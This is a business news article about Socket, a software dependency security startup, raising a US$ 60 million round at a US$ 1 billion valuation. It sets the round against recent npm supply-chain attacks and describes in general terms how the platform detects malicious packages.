Socket Reaches US$ 1 Billion Valuation with US$ 60 Million Round Focused on npm and PyPI Dependency Security

Socket, an American startup founded in 2020 specialising in software dependency security, announced on Thursday, May 21st, a US$ 60 million Series C round led by Thrive Capital, with participation from Andreessen Horowitz, Abstract Ventures and Capital One Ventures. This round raises the total amount raised by the company to US$ 125 million and establishes a valuation of US$ 1 billion, making Socket the first company to reach unicorn status focused exclusively on software dependency security in records such as npm and PyPI.

The announcement came on the same afternoon that GitHub confirmed that 3,800 internal repositories had been compromised through a tampered VS Code extension, with the attack chain tracing back to compromised TanStack npm packages by the TeamPCP group. The coincidence of the dates is not accidental: the demand for protection in this specific layer of the software development chain has rarely been so visible to boards and CISOs.

What the Platform Does

Socket monitors npm, PyPI, and other open source code registries for malicious behaviour before dependencies are incorporated into projects. The system analyses new code at the time of publication, identifying suspicious patterns such as unusual access to environment variables, undeclared shell commands, and data exfiltration attempts. According to the company, the platform blocks over 1,000 attacks per week.

The distinction from traditional vulnerability scanners is precise: tools like Dependabot or npm audit operate on known CVE databases, responding to catalogued vulnerabilities. Socket analyses the behaviour of new code before any CVE is assigned, positioning itself closer to a behavioural detection system rather than a signature database. This model is particularly relevant for attacks such as Mini Shai-Hulud, which published 84 malicious artifacts in 42 @tanstack packages before any CVE-based scanner could detect them.

Who Invested and Why

Thrive Capital, which also figures among the main shareholders of OpenAI, led the round. Thrive's involvement in AI model infrastructure and software supply chain security reflects the thesis that the accelerated growth of AI-based development structurally increases the attack surface at the dependency layer: the more AI agents consume open source packages to perform coding tasks, the greater the incentive for attackers to compromise these packages.

The participation of Capital One Ventures distinguishes this round from previous investments in software security. Banks and insurers that have adopted agile development cycles and use npm as their primary registry face the same risks that have impacted GitHub and Grafana: a single compromised dependency in a CI/CD pipeline can escalate to access to production systems. The interest of financial institutions in open source security solutions signals that the risk of software supply chains has left the technical realm and is now being treated as a top-tier operational risk.

What Changes for Corporate Development Teams

For CISOs of companies with large codebases that rely on public package registries, Socket offers a pre-integration analysis layer that complements but does not replace existing software composition tools. The US$ 60 million round will finance coverage expansion to new registries beyond npm and PyPI, development of native integrations with CI/CD pipelines, and the hiring of a threat research team.

For consulting firms delivering development projects with open source dependencies, the practical issue is one of liability: following incidents such as TanStack, corporate clients tend to include dependency audit clauses in development contracts. The ability to demonstrate that the CI/CD pipeline is protected by behaviour analysis of packages, and not merely by scans for known CVEs, becomes a differentiating factor in the value proposition.

The timing of the investment follows a well-documented historical pattern: significant rounds in software supply chain security tend to cluster after high-visibility incidents. After Log4Shell in December 2021, the software bill of materials and software composition analysis market grew 340% in two years, according to Gartner data. The attack on TanStack and its cascading effects on GitHub and Grafana represent the most visible catalyst of the current cycle.